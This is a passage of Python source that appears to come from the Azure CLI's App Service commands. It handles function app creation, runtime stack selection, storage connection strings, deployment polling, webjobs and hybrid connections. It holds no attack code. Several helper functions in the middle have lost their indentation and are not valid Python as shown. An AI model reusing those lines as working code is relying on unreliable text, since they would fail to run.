        return site_config
    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Apply the stack's config key/values as app settings, updating in place
        when a setting with the same name already exists."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        for k, v in stack['configs'].items():
            already_in_appsettings = False
            for app_setting in site_config.app_settings:
                if app_setting.name == k:
                    already_in_appsettings = True
                    app_setting.value = v
            if not already_in_appsettings:
                site_config.app_settings.append(NameValuePair(name=k, value=v))
        return site_config
    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled RUNTIME_STACKS file (no-op when cached)."""
        if self._stacks:
            return
        result = []
        if self._linux:
            result = get_file_json(RUNTIME_STACKS)['linux']
            for r in result:
                r['setter'] = _StackRuntimeHelper.update_site_config
        else:  # Windows stacks
            result = get_file_json(RUNTIME_STACKS)['windows']
            for r in result:
                # node is configured via app settings; everything else via site config
                r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                               r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # Stacks API is updated with Antares deployments,
    # which are infrequent and don't line up with stacks EOL schedule.
    def _load_stacks(self):
        """Populate self._stacks from the live provider stacks API (currently unused; see note above)."""
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component.

    Raises CLIError when the component or its key cannot be found.
    """
    client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = client.components.get(resource_group, name)
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None, location=None, tags=None):
    """Create an App Service plan for function apps.

    --max-burst is only valid for Elastic Premium SKUs (0-20); number_of_workers
    is clamped to 0-20 as well. Location defaults to the resource group's.
    Returns the create/update poller.
    """
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)
    client = web_client_factory(cmd.cli_ctx)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
    # reserved=True marks a Linux plan; hyper_v is intentionally left unset.
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
    """Return True if the plan is a Consumption ('Dynamic' tier) plan."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if not isinstance(plan_info, AppServicePlan):
        return False
    if not isinstance(plan_info.sku, SkuDescription):
        return False
    return plan_info.sku.tier.lower() == 'dynamic'
def is_plan_elastic_premium(cmd, plan_info):
    """Return True if the plan is an Elastic Premium (EP) plan."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            # Consistency fix: compare case-insensitively, matching the
            # is_plan_consumption helper above (the service canonically reports
            # 'ElasticPremium', but casing should not matter).
            return plan_info.sku.tier.lower() == 'elasticpremium'
    return False
def validate_and_convert_to_int(flag, val):
    """Convert *val* to int, raising a CLIError that names the flag on failure."""
    try:
        return int(val)
    except ValueError as ex:
        # Chain the original error so the root cause is visible with --debug.
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag)) from ex
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    """Parse *value* as int and ensure min_val <= value <= max_val (inclusive)."""
    parsed = validate_and_convert_to_int(flag_name, value)
    if not min_val <= parsed <= max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
                                                                                                max_val))
    return parsed
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
                    os_type=None, functions_version=None, runtime=None, runtime_version=None,
                    consumption_plan_location=None, app_insights=None, app_insights_key=None,
                    disable_app_insights=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    docker_registry_server_password=None, docker_registry_server_user=None,
                    deployment_container_image_name=None, tags=None, assign_identities=None,
                    role='Contributor', scope=None):
    """Create an Azure Function App on a consumption plan or an existing App Service plan.

    Exactly one of plan / consumption_plan_location must be supplied. The requested
    runtime / runtime_version / functions_version combination is validated against the
    bundled runtime-stacks JSON; storage, Application Insights, container and git
    deployment settings are wired into the site config before creation.

    :return: the created site object (with identity attached when requested).
    :raises CLIError: on conflicting/invalid arguments or unsupported runtime combos.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
                       "be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
        functions_version = '2'
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    # the flag arrives as a string; normalize it to a real bool
    disable_app_insights = (disable_app_insights == "true")
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config, tags=tags)
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    client = web_client_factory(cmd.cli_ctx)
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        # 'reserved' is the ARM flag indicating a Linux plan
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
        raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
                       "pass in the flag '--functions-version 3'")
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
    if runtime is None and runtime_version is not None:
        raise CLIError('Must specify --runtime to use --runtime-version')
    # get the matching runtime stack object (dotnet is the default runtime)
    runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
    if not runtime_json:
        # no matching runtime for os
        os_string = "linux" if is_linux else "windows"
        supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
        raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
                       .format(os_string, ', '.join(supported_runtimes)))
    runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
                                                                          functions_version,
                                                                          runtime_version,
                                                                          is_linux)
    if not runtime_version_json:
        supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
                                              _get_supported_runtime_versions_functionapp(runtime_json,
                                                                                          functions_version)))
        if runtime_version:
            if runtime == 'dotnet':
                raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
                               'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
                               .format(runtime_version, functions_version))
            raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}.'
                           .format(runtime_version,
                                   runtime,
                                   functions_version,
                                   ', '.join(supported_runtime_versions)))
        # if runtime_version was not specified, then that runtime is not supported for that functions version
        raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
                       '--functions-version {}'
                       .format(runtime, functions_version))
    if runtime == 'dotnet':
        logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
                       '--functions-version. Dotnet version will be %s for this function app.',
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    if runtime_version_json[KEYS.IS_DEPRECATED]:
        logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
                       'Please update your command to use a more recent version. For a list of supported '
                       '--runtime-versions, run \"az functionapp create -h\"',
                       runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
    site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
    app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
                # clear all runtime specific configs and settings
                site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
                app_settings_json = {}
                # ensure that app insights is created if not disabled
                runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs (stack JSON uses camelCase property names; SDK model uses snake_case)
    for prop, value in site_config_json.items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # temporary workaround for dotnet-isolated linux consumption apps
    if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
        site_config.linux_fx_version = ''
    # adding app settings
    for app_setting, value in app_settings_json.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or consumption, we need these app settings
    if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        # set up dashboard if no app insights
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        create_app_insights = True
    poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # best-effort: fall back to the classic dashboard setting on any AI failure
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        functionapp.identity = identity
    return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
    """Load the Functions runtime-stack definitions for the requested OS from the bundled JSON."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    os_key = 'linux' if is_linux else 'windows'
    return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS[os_key])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
    """Return the first stack entry whose name equals *runtime*, or None when absent."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    for stack in stacks_json:
        if stack[KEYS.NAME] == runtime:
            return stack
    return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
    """Return the major-version entries that support the given Functions extension version."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    return [version_json
            for version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]
            if extension_version in version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]]
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
    """Select the stack-version entry for an explicit runtime_version, or the newest
    version flagged as default that supports functions_version.

    Returns None (explicit request, no match) or {} (no default found) on failure.
    """
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    if runtime_version:
        # an explicit version must match the display name exactly and support the extension version
        for candidate in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
            if (candidate[KEYS.DISPLAY_VERSION] == runtime_version and
                    extension_version in candidate[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
                return candidate
        return None
    # find the matching default runtime version: highest-numbered default among the supported ones
    best_json = {}
    best_version = 0.0
    for candidate in _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
        if not candidate[KEYS.IS_DEFAULT]:
            continue
        candidate_version = _get_runtime_version_functionapp(candidate[KEYS.RUNTIME_VERSION], is_linux)
        if not best_json or best_version < candidate_version:
            best_json = candidate
            best_version = candidate_version
    return best_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse a runtime version string into a comparable float; 0 when unparsable.

    Tries the Windows pattern first, then the Linux pattern, then a plain float parse
    (mirroring the original lookup order; *is_linux* is accepted for signature
    compatibility but does not change the matching order).
    """
    import re
    for pattern in (FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX):
        match = re.fullmatch(pattern, version_string)
        if match:
            return float(match.group(1))
    try:
        return float(version_string)
    except ValueError:
        return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
    """Best-effort creation of an Application Insights component named after the
    function app, wiring its instrumentation key into the app settings on success."""
    failure_warning = 'Unable to create the Application Insights for the Function App. ' \
                      'Please use the Azure Portal to manually create and configure the Application Insights, ' \
                      'if needed.'
    ai_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    component = ai_client.components.create_or_update(
        functionapp.resource_group,
        functionapp.name,
        {
            "name": functionapp.name,
            "location": functionapp.location,
            "kind": "web",
            "properties": {
                "Application_Type": "web"
            }
        })
    if component is None or component.instrumentation_key is None:
        logger.warning(failure_warning)
        return
    # We make this success message as a warning to no interfere with regular JSON output in stdout
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', component.name, component.id)
    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(component.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Configure remote-git (manual integration) and/or local-git deployment on a site.

    Remote-git link failures are logged as warnings rather than raised.
    """
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", git_info['url'])
        webapp.deploymentLocalGitUrl = git_info['url']
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate a storage account for use by a function app and build its connection string.

    *storage_account* may be a plain account name (assumed to live in
    resource_group_name) or a full resource ID.

    :raises CLIError: listing every validation problem found (missing blob/queue/table
        endpoint, disallowed SKU).
    :return: a DefaultEndpointsProtocol connection string using the primary key.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_parts = parse_resource_id(storage_account)  # parse once, use both fields
        sa_resource_group = sa_parts['resource_group']
        storage_account = sa_parts['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    errors = []
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
    # BUGFIX: previously each missing endpoint overwrote the prior message and the SKU
    # message was appended with no separator; collect all problems and join them.
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            errors.append("Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e))  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        errors.append('Storage type {} is not allowed'.format(sku))
    if errors:
        raise CLIError('. '.join(errors))
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations(cmd):
    """Return the regions offering a consumption (Dynamic) plan, lower-cased without spaces."""
    regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    return [{'name': region.name.lower().replace(' ', '')} for region in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
    """Return the geo regions supporting the given SKU that are also valid 'sites' locations."""
    full_sku = get_sku_name(sku)
    geo_regions = web_client_factory(cmd.cli_ctx).list_geo_regions(
        sku=full_sku, linux_workers_enabled=linux_workers_enabled)
    providers_client = providers_client_factory(cmd.cli_ctx)
    sites_locations = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
    for resource_type in sites_locations:
        if resource_type.resource_type == 'sites':
            sites_locations = resource_type.locations
            break
    return [region for region in geo_regions if region.name in sites_locations]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll the Kudu deployment-status endpoint every 2s until success (status 4) or failure (status 3).

    :param timeout: overall timeout in seconds; defaults to ~900s (450 polls).
    :raises CLIError: when the deployment fails or the timeout elapses.
    :return: the final status payload returned by the endpoint.
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    # BUGFIX: initialize so a timeout < 4s (zero trials) cannot hit a NameError below
    res_dict = {}
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
            res_dict = {}
        finally:
            num_trials = num_trials + 1
        if res_dict.get('status', 0) == 3:
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
                           "-n {} -g {}".format(res_dict, name, rg_name))
        if res_dict.get('status', 0) == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation
        is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List the continuous webjobs of a site (or one of its deployment slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous webjob and return its refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous webjob and return its refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous webjob from a site (or one of its deployment slots)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List the triggered webjobs of a site (or one of its deployment slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Trigger a webjob run and return the webjob's refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered webjob from a site (or one of its deployment slots)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
    """List the hybrid connections of a webapp (or slot), pruned to the useful fields."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        raw = web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        raw = web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
    # reformats hybrid connection, to prune unnecessary fields
    trimmed = []
    for entry in raw.additional_properties["value"]:
        props = entry["properties"]
        id_segments = entry["id"].split("/")
        trimmed.append({
            "id": entry["id"],
            "location": entry["location"],
            "name": entry["name"],
            "properties": {
                "hostname": props["hostname"],
                "port": props["port"],
                "relayArmUri": props["relayArmUri"],
                "relayName": props["relayName"],
                "serviceBusNamespace": props["serviceBusNamespace"],
                "serviceBusSuffix": props["serviceBusSuffix"]
            },
            "resourceGroup": id_segments[4],
            "type": entry["type"]
        })
    return trimmed
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach an existing Service Bus Relay hybrid connection to a webapp (or slot).

    Resolves the relay namespace, ensures a send-capable "defaultSender" authorization
    rule exists on the hybrid connection, registers the connection on the site, and
    returns a pruned summary dict.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # resolve the namespace name to its full ARM id
    hy_co_id = ''
    for n in namespace_client.list():
        logger.warning(n.name)
        if n.name == namespace:
            hy_co_id = n.id
    if hy_co_id == '':
        raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
    # pull the resource group out of the namespace id path segments
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1
    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
